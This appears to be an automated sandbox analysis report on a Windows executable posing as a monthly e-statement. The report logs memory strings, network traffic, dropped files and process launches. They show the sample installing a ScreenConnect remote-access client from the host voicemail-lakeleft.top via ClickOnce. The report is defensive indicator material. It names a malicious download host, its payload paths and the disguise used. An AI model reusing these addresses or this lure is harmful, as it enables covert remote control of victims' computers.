                  Source: svchost.exe, 00000007.00000002.3287690750.0000021CA1E47000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceUpdate.srf%
                  Source: svchost.exe, 00000007.00000003.2075672208.0000021CA2740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2075626421.0000021CA273B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2075692660.0000021CA2763000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3287690750.0000021CA1E47000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/EnumerateDevices.srf
                  Source: svchost.exe, 00000007.00000003.2075672208.0000021CA2740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2075626421.0000021CA273B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2075692660.0000021CA2763000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3287690750.0000021CA1E47000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/ResolveUser.srf
                  Source: svchost.exe, 00000007.00000002.3287690750.0000021CA1E47000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/deviceaddmsacredential.srf
                  Source: svchost.exe, 00000007.00000002.3287690750.0000021CA1E47000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/devicechangecredential.srf
                  Source: svchost.exe, 00000007.00000003.2075737545.0000021CA2727000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/devicechangecredential.srfMM
                  Source: svchost.exe, 00000007.00000002.3287690750.0000021CA1E47000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/deviceremovecredential.srf
                  Source: qmgr.db.6.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe/C:
                  Source: svchost.exe, 00000007.00000003.2075626421.0000021CA273B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2075138929.0000021CA272C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3287690750.0000021CA1E47000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://signup.live.com/signup.aspx
                  Source: dfsvc.exe, 00000002.00000002.2973425425.0000025D1D916000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2973425425.0000025D1DB2A000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2973425425.0000025D1DDBC000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2973425425.0000025D1DE0A000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2973425425.0000025D1DA82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://voicemail-lakeleft.top
                  Source: dfsvc.exe, 00000002.00000002.2973425425.0000025D1DA82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://voicemail-lakeleft.top/Bin/ScreenConnect.C
                  Source: dfsvc.exe, 00000002.00000002.2979497354.0000025D35E86000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2982317556.0000025D39540000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2981642219.0000025D37CFE000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2973425425.0000025D1D9AB000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2972728761.0000025D1BCD3000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2983207645.0000025D39609000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.2447762978.0000000002EA1000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.2447762978.0000000002EAF000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.2450825979.000000001B8AA000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.2446849268.000000000116F000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.2451144546.000000001B8F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://voicemail-lakeleft.top/Bin/ScreenConnect.Client.application
                  Source: dfsvc.exe, 00000002.00000002.2973425425.0000025D1D9AB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://voicemail-lakeleft.top/Bin/ScreenConnect.Client.application#Scree
                  Source: dfsvc.exe, 00000002.00000002.2973425425.0000025D1D9AB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://voicemail-lakeleft.top/Bin/ScreenConnect.Client.application#ScreeP
                  Source: dfsvc.exe, 00000002.00000002.2983530978.0000025D396A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://voicemail-lakeleft.top/Bin/ScreenConnect.Client.application#ScreenConnect.WindowVF
                  Source: ScreenConnect.WindowsClient.exe, 00000009.00000002.2447543283.00000000014B4000.00000004.00000020.00020000.00000000.sdmp, S5L60WDT.log.2.drString found in binary or memory: https://voicemail-lakeleft.top/Bin/ScreenConnect.Client.application#ScreenConnect.WindowsClient.appl
                  Source: dfsvc.exe, 00000002.00000002.2983530978.0000025D396A1000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.2447348607.00000000011D0000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.2450614110.000000001B870000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://voicemail-lakeleft.top/Bin/ScreenConnect.Client.application%
                  Source: S5L60WDT.log.2.drString found in binary or memory: https://voicemail-lakeleft.top/Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=popwee2.zapt
                  Source: ScreenConnect.WindowsClient.exe, 00000009.00000002.2446849268.000000000116F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://voicemail-lakeleft.top/Bin/ScreenConnect.Client.applicationO$
                  Source: ScreenConnect.WindowsClient.exe, 00000009.00000002.2447762978.0000000002EAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://voicemail-lakeleft.top/Bin/ScreenConnect.Client.applicationX
                  Source: ScreenConnect.WindowsClient.exe, 00000009.00000002.2450825979.000000001B8AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://voicemail-lakeleft.top/Bin/ScreenConnect.Client.applicationY;
                  Source: dfsvc.exe, 00000002.00000002.2983207645.0000025D39609000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://voicemail-lakeleft.top/Bin/ScreenConnect.Client.applicationYDataer
                  Source: ScreenConnect.WindowsClient.exe, 00000009.00000002.2450913714.000000001B8BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://voicemail-lakeleft.top/Bin/ScreenConnect.Client.applicationg=
                  Source: dfsvc.exe, 00000002.00000002.2983207645.0000025D39609000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://voicemail-lakeleft.top/Bin/ScreenConnect.Client.applicationre=msil
                  Source: dfsvc.exe, 00000002.00000002.2983207645.0000025D39609000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://voicemail-lakeleft.top/Bin/ScreenConnect.Client.applications_
                  Source: ScreenConnect.WindowsClient.exe, 00000009.00000002.2450825979.000000001B8AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://voicemail-lakeleft.top/Bin/ScreenConnect.Client.applications_4c015cY
                  Source: dfsvc.exe, 00000002.00000002.2983207645.0000025D39609000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://voicemail-lakeleft.top/Bin/ScreenConnect.Client.applications_ecture=msil;
                  Source: dfsvc.exe, 00000002.00000002.2983207645.0000025D39609000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://voicemail-lakeleft.top/Bin/ScreenConnect.Client.applicationt
                  Source: dfsvc.exe, 00000002.00000002.2982317556.0000025D3955E000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2973425425.0000025D1DDBC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://voicemail-lakeleft.top/Bin/ScreenConnect.Client.dll
                  Source: ScreenConnect.WindowsClient.exe, 00000009.00000002.2447762978.0000000002EAF000.00000004.00000800.00020000.00000000.sdmp, S5L60WDT.log.2.drString found in binary or memory: https://voicemail-lakeleft.top/Bin/ScreenConnect.Client.manifest
                  Source: dfsvc.exe, 00000002.00000002.2981524853.0000025D37CE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://voicemail-lakeleft.top/Bin/ScreenConnect.Client.manifest$
                  Source: dfsvc.exe, 00000002.00000002.2982317556.0000025D3955E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://voicemail-lakeleft.top/Bin/ScreenConnect.Client.manifest:
                  Source: dfsvc.exe, 00000002.00000002.2973425425.0000025D1DDBC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://voicemail-lakeleft.top/Bin/ScreenConnect.ClientSer
                  Source: dfsvc.exe, 00000002.00000002.2973425425.0000025D1DDBC000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2973425425.0000025D1DE0A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://voicemail-lakeleft.top/Bin/ScreenConnect.ClientService.dll
                  Source: dfsvc.exe, 00000002.00000002.2981524853.0000025D37CE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://voicemail-lakeleft.top/Bin/ScreenConnect.ClientService.dll6
                  Source: dfsvc.exe, 00000002.00000002.2981524853.0000025D37CE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://voicemail-lakeleft.top/Bin/ScreenConnect.ClientService.dll~
                  Source: dfsvc.exe, 00000002.00000002.2982317556.0000025D3955E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://voicemail-lakeleft.top/Bin/ScreenConnect.ClientService.exe
                  Source: dfsvc.exe, 00000002.00000002.2982317556.0000025D3955E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://voicemail-lakeleft.top/Bin/ScreenConnect.ClientService.exeG
                  Source: dfsvc.exe, 00000002.00000002.2973425425.0000025D1DA82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://voicemail-lakeleft.top/Bin/ScreenConnect.Core.dll
                  Source: dfsvc.exe, 00000002.00000002.2973425425.0000025D1DE0A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://voicemail-lakeleft.top/Bin/ScreenConnect.Windo
                  Source: dfsvc.exe, 00000002.00000002.2973425425.0000025D1DE0A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://voicemail-lakeleft.top/Bin/ScreenConnect.Windows.dll
                  Source: dfsvc.exe, 00000002.00000002.2981642219.0000025D37CFE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://voicemail-lakeleft.top/Bin/ScreenConnect.WindowsBackstageShell.exe
                  Source: dfsvc.exe, 00000002.00000002.2981594079.0000025D37CF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://voicemail-lakeleft.top/Bin/ScreenConnect.WindowsBackstageShell.exe.config
                  Source: dfsvc.exe, 00000002.00000002.2981642219.0000025D37CFE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://voicemail-lakeleft.top/Bin/ScreenConnect.WindowsBackstageShell.exed
                  Source: dfsvc.exe, 00000002.00000002.2973425425.0000025D1DA82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://voicemail-lakeleft.top/Bin/ScreenConnect.WindowsClient.exe
                  Source: dfsvc.exe, 00000002.00000002.2981642219.0000025D37CFE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://voicemail-lakeleft.top/Bin/ScreenConnect.WindowsClient.exe.config
                  Source: dfsvc.exe, 00000002.00000002.2981642219.0000025D37CFE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://voicemail-lakeleft.top/Bin/ScreenConnect.WindowsClient.exe.config:
                  Source: dfsvc.exe, 00000002.00000002.2981642219.0000025D37CFE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://voicemail-lakeleft.top/Bin/ScreenConnect.WindowsFileManager.exe
                  Source: dfsvc.exe, 00000002.00000002.2981594079.0000025D37CF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://voicemail-lakeleft.top/Bin/ScreenConnect.WindowsFileManager.exe.config
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49818
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
                  Source: unknownHTTPS traffic detected: 194.59.30.201:443 -> 192.168.2.5:49705 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 194.59.30.201:443 -> 192.168.2.5:49728 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 194.59.30.201:443 -> 192.168.2.5:49731 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 194.59.30.201:443 -> 192.168.2.5:49736 version: TLS 1.2
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F2E248BEDDBB2D85122423C41028BFD4Jump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141Jump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C56C4404C4DEF0DC88E5FCD9F09CB2F1Jump to dropped file

                  Spam, unwanted Advertisements and Ransom Demands

                  barindex
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security\ScreenConnect
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security\ScreenConnect
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\ScreenConnect
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\ScreenConnect
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\ScreenConnect

                  System Summary

                  barindex
                  Source: monthly-eStatementForum120478962.Client.exePE Siganture Subject Chain: CN="Connectwise, LLC", O="Connectwise, LLC", L=Tampa, S=Florida, C=US
                  Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
                  Source: C:\Users\user\Desktop\monthly-eStatementForum120478962.Client.exeCode function: 0_2_009AA4950_2_009AA495
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 2_2_00007FF848F59D7D2_2_00007FF848F59D7D
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 2_2_00007FF848F4AF4F2_2_00007FF848F4AF4F
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 2_2_00007FF848F6B21D2_2_00007FF848F6B21D
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 2_2_00007FF848F533B12_2_00007FF848F533B1
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 2_2_00007FF848F5D5992_2_00007FF848F5D599
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 2_2_00007FF848F527582_2_00007FF848F52758
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 2_2_00007FF848F460102_2_00007FF848F46010
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 2_2_00007FF848F630F12_2_00007FF848F630F1
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 2_2_00007FF848F412112_2_00007FF848F41211
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 2_2_00007FF848F4F4412_2_00007FF848F4F441
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 2_2_00007FF848F628382_2_00007FF848F62838
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeCode function: 12_2_00007FF848F170BA12_2_00007FF848F170BA
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeCode function: 12_2_00007FF848F110CF12_2_00007FF848F110CF
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeCode function: 12_2_00007FF848F110D712_2_00007FF848F110D7
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeCode function: 12_2_00007FF849226A0812_2_00007FF849226A08
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeCode function: 12_2_00007FF84922595112_2_00007FF849225951
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeCode function: 12_2_00007FF8492201D012_2_00007FF8492201D0
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeCode function: 12_2_00007FF849226A6B12_2_00007FF849226A6B
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 2260 -ip 2260
                  Source: monthly-eStatementForum120478962.Client.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: ScreenConnect.WindowsBackstageShell.exe.2.dr, PopoutPanelTaskbarButton.csTask registration methods: 'CreateDefaultDropDown'
                  Source: ScreenConnect.WindowsBackstageShell.exe.2.dr, ProgramTaskbarButton.csTask registration methods: 'CreateDefaultDropDown'
                  Source: ScreenConnect.WindowsBackstageShell.exe.2.dr, TaskbarButton.csTask registration methods: 'CreateDefaultDropDown'
                  Source: ScreenConnect.WindowsBackstageShell.exe0.2.dr, PopoutPanelTaskbarButton.csTask registration methods: 'CreateDefaultDropDown'
                  Source: ScreenConnect.WindowsBackstageShell.exe0.2.dr, ProgramTaskbarButton.csTask registration methods: 'CreateDefaultDropDown'
                  Source: ScreenConnect.WindowsBackstageShell.exe0.2.dr, TaskbarButton.csTask registration methods: 'CreateDefaultDropDown'
                  Source: ScreenConnect.Windows.dll.2.dr, WindowsExtensions.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                  Source: ScreenConnect.Windows.dll.2.dr, WindowsExtensions.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: ScreenConnect.Windows.dll.2.dr, WindowsExtensions.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                  Source: ScreenConnect.ClientService.dll.2.dr, WindowsLocalUserExtensions.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
                  Source: classification engineClassification label: mal51.evad.winEXE@18/76@2/2
                  Source: C:\Users\user\Desktop\monthly-eStatementForum120478962.Client.exeCode function: 0_2_009A1000 LocalAlloc,LocalAlloc,GetModuleFileNameW,CertOpenSystemStoreA,LocalAlloc,LocalAlloc,CryptQueryObject,LocalFree,CryptMsgGetParam,CryptMsgGetParam,LocalAlloc,LocalAlloc,CryptMsgGetParam,CertCreateCertificateContext,CertAddCertificateContextToStore,CertFreeCertificateContext,LocalFree,CryptMsgGetParam,LocalFree,LocalFree,CryptMsgGetParam,CryptMsgGetParam,CertFindAttribute,CertFindAttribute,CertFindAttribute,LoadLibraryA,GetProcAddress,Sleep,CertDeleteCertificateFromStore,CertDeleteCertificateFromStore,CertCloseStore,LocalFree,LocalFree,LocalFree,0_2_009A1000
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\DeploymentJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeMutant created: NULL
                  Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2260
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeMutant created: \BaseNamedObjects\Global\netfxeventlog.1.0
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\DeploymentJump to behavior
                  Source: C:\Users\user\Desktop\monthly-eStatementForum120478962.Client.exeCommand line argument: dfshim0_2_009A1000
                  Source: monthly-eStatementForum120478962.Client.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: C:\Users\user\Desktop\monthly-eStatementForum120478962.Client.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: unknownProcess created: C:\Users\user\Desktop\monthly-eStatementForum120478962.Client.exe "C:\Users\user\Desktop\monthly-eStatementForum120478962.Client.exe"
                  Source: C:\Users\user\Desktop\monthly-eStatementForum120478962.Client.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe"
                  Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 2260 -ip 2260
                  Source: C:\Users\user\Desktop\monthly-eStatementForum120478962.Client.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2260 -s 700
                  Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                  Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
